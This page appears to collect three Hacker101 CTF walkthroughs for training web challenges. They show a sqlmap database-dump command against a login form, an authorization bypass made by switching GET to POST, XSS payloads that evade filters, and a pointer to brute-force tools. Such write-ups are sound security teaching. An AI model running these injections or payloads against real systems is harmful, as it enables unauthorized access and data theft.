Categories
Capture the Flag & Red Teaming

Walkthrough – Hacker101 – Micro-CMS v2

This post is a writeup of Micro-CMS v2, a Hacker101 CTF web hacking challenge. The challenge is categorized as Moderate, has three flags and a total of 7 hints is provided:

Flag0

  1. Regular users can only see public pages
  2. Getting admin access might require a more perfect union
  3. Knowing the password is cool, but there are other approaches that might be easier

Flag1

  1. What actions could you perform as a regular user on the last level, which you can’t now?
  2. Just because request fails with one method doesn’t mean it will fail with a different method
  3. Different requests often have different required authorization

Flag2

  1. Credentials are secret, flags are secret. Coincidence?

Following the provided link leads directly to the main page.

Flag 0

The main page looks quite similar to the main page of Micro-CMS v1. However, this time we cannot simply use the edit functionality to retrieve sites. Instead edit and create require authentication.

Probing the login form via the username field and a MySQL control character results in the following error:

From here, we know that the username field is prone to SQL injection and, furthermore, we can extract the query syntax to perform an adequate injection.

Two different approaches can be chosen next. We will use sqlmap to retrieve information from the database as suggested in the previous writeup. The alternative is to perform an authentication bypass to successfully login and analyse the CMS from there. The sqlmap command to search valid injection payload and dump the databases is as follows:

sqlmap -u “http://[ip]/[id]/login” –data=”username=1&password=2″ –dump

sqlmap identifies several payload options that are valid for further exploitation.

Dumping the table pages provides the content of each site stored in the CMS. One of the sites, named Private Page, contains the flag.

If the alternative path would be followed, the authentication bypass would have led to admin access to the CMS. With admin access the site Private Page, which contains the flag, would be available from within the CMS.

Flag 1

Using the edit function requires a valid login. If the site is requested via GET method, the response is a redirect to the login page.

Changing the request type to POST, circumvents the access protection and results in the flag.

Flag 2

As we already used sqlmap to access the database, we are able to receive each table in the database. A second table (admins) that can be accessed contains valid cleartext credentials for the login page.

Using these credentials on the login form results in the last flag.

If the alternative approach was followed, no credentials would be available to login. In this case, the flag can be obtained by using hyrda, medusa or burpsuite sniper to conduct a brute-force attack against the site. Solid wordlists for such attacks can be found from jeanphorn, SecLists and at /usr/share/wordlists/ on each Kali distribution.

Categories
Capture the Flag & Red Teaming

Walkthrough – Hacker101 – Micro-CMS v1

This post is a writeup of Micro-CMS v1, a Hacker101 CTF web hacking challenge. The challenge is categorized as Easy, has four flags and a total of 12 hints is provided:

Flag0

  1. Try creating a new page
  2. How are pages indexed?
  3. Look at the sequence of IDs
  4. If the front door doesn’t open, try the window
  5. In what ways can you retrieve page contents?

Flag1

  1. Make sure you tamper with every input
  2. Have you tested for the usual culprits? XSS, SQL injection, path injection
  3. Bugs often occur when an input should always be one type and turns out to be another
  4. Remember, form submissions aren’t the only inputs that come from browsers

Flag2

  1. Sometimes a given input will affect more than one page
  2. The bug you are looking for doesn’t exist in the most obvious place this input is shown

Flag3

  1. Script tags are great, but what other options do you have?

Following the provided link leads directly to the main page.

Flag 0

As it can be seen, there are two sample pages (Testing and Markdown Test) as well as a link to a create a new page functionality. In a first step, the samples are reviewed.

There is not much information on the first sample page, however, there appears to be another functionality to edit existing pages. We keep this in mind and explore the second sample page.

On the second page is also not much information provided. An interesting observation at this point is that the pages appears to be accessed via the following syntax:

http://[ip]/[id]/page/[number]

The observed (page) numbers are 1 and 2 so far. To further investigate the numbering scheme, a new page is created.

Accessing the page reveals the assigned number.

Interestingly, the assigned number is 10, while the two sample pages are numbered 1 and 2. Enumerating the missing 8 pages, reveals that 7 are not available on the server. However, page number 5 responses with access forbidden.

As we already discovered the edit functionality, we quickly identify the syntax to edit a page as:

http://[ip]/[id]/page/edit/[number]

And try to access the page via the edit function.

Fortunately, the edit function shown the page that is being edited. This way the first flag can be retrieved.

Flag 1

From our observations, we already know that the provided number is used to read the stored pages from the server. A common initial test for SQL injection vulnerabilities is to add control characters to queries. As these characters vary between different database management systems, a trial and error approach is required without further information. An awesome tool to automate this task is sqlmap.

However, as initial probe, we add the MySQL string termination character ‘ to the two queries we already identified as follows:

http://[ip]/[id]/page/[number]’
http://[ip]/[id]/page/edit/[number]’

The second query results in the flag, indicating that the edit functionality is not only prone to access violations but also to SQL injections.

Flag 2 and 3

In a next step we analyse the input via HTTP form data. There are two potential vectors for injection of malicious content within the create new page functionality: The title and the body.

An initial probe for XSS vulnerabilities with the following payload in the body field is send:

<IMG SRC=javascript:alert(‘XSS’)>

The result reveals that the term script appears to be modified to scrubbed to filter javascript.

This filter can be evaded by choosing a payload that does not rely on the term script. OWASP provides a good cheatsheet with payloads for filter evasion.

The following payload is chosen for further investigation:

<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,88))”></img>

To speed up the analyses, the payload is injected in both fields at the same time. Accessing the source code of the edited page after injection results in the first flag.

The second XSS flag can be retrieved by accessing the main page, where the title of each page is listed.

Categories
Capture the Flag & Red Teaming

Walkthrough – Hacker101 – A little something to get you started

This post is a writeup of A little something to get you started, a Hacker101 CTF web hacking challenge. The challenge is categorized as Trivial, has one flag and a total of four hints is provided:

  1. Take a look at the source for the page
  2. Does anything seem out of the ordinary?
  3. The page looks really plain
  4. What is that image?

Following the provided link leads directly to the main page.

Flag 0

As there is not to much information on the rendered page, a good next step is to quickly check the page source code for additional information.

In the source code, we can see that there is an image (background.png) set as background image. Accessing this image results in the flag.